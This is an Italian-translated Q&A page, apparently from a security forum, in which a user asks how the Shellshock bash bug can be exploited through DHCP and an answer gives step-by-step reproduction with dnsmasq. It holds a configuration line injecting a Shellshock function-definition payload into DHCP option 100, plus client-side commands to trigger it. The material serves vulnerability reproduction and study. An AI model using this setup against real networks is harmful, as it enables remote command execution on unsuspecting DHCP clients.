shellshock dhcp exploitation

1

Un utente malintenzionato può sfruttare il bug di bash nel protocollo DHCP. Durante la ricerca, come può essere eseguita, ho trovato " link ", ma non è stato possibile trovare alcun tutorial che lo mostri sulla macchina Linux.

Si prega di spiegare come può essere usato per attaccare i client che utilizzano il server DHCP su linux. Quali configurazioni devono essere eseguite nel server DHCP?

    
posta jonny789 03.10.2014 - 08:17
fonte

1 risposta

8

Per riprodurre questa vulnerabilità sui sistemi * nix, segui questi passaggi:

  • Installa dnsmasq. Sulla macchina Ubuntu può essere fatto eseguendo il seguente comando:

    sudo apt-get install dnsmasq
    
  • Aggiungi le seguenti righe al file di configurazione /etc/dnsmasq.conf :

    interface="iface_server"
    
    dhcp-range="ip_start","ip_end",12h
    
    dhcp-option-force=100,() { :; }; echo 'You are going to be shocked..ShellShock !!!'>/tmp/
    

    Il codice vulnerabile verrà inserito nel campo dhcp-option dell'intestazione.

    Dove è in ascolto il server DHCP dell'interfaccia di rete e ip_start , ip_end è l'intervallo di indirizzi IP che il server distribuirà.

  • Sul computer di destinazione verificare che sia configurata un'interfaccia per utilizzare il client DHCP. Può essere fatto guardando il / etc / network / interfaces file .

    Le seguenti righe devono essere nel file:

    auto "iface_client"
    
    iface "iface_client" inet dhcp
    
  • Sul computer vulnerabile inserisci il seguente comando:

    sudo ifdown "iface_client" && sudo ifup "iface_client"
    

    Dove iface_client è l'interfaccia di rete Il client DHCP acquisirà l'indirizzo IP per.

Tieni presente che iface_server e iface_client devono essere connessi alla stessa rete.

    
risposta data 03.10.2014 - 08:25
fonte

Leggi altre domande sui tag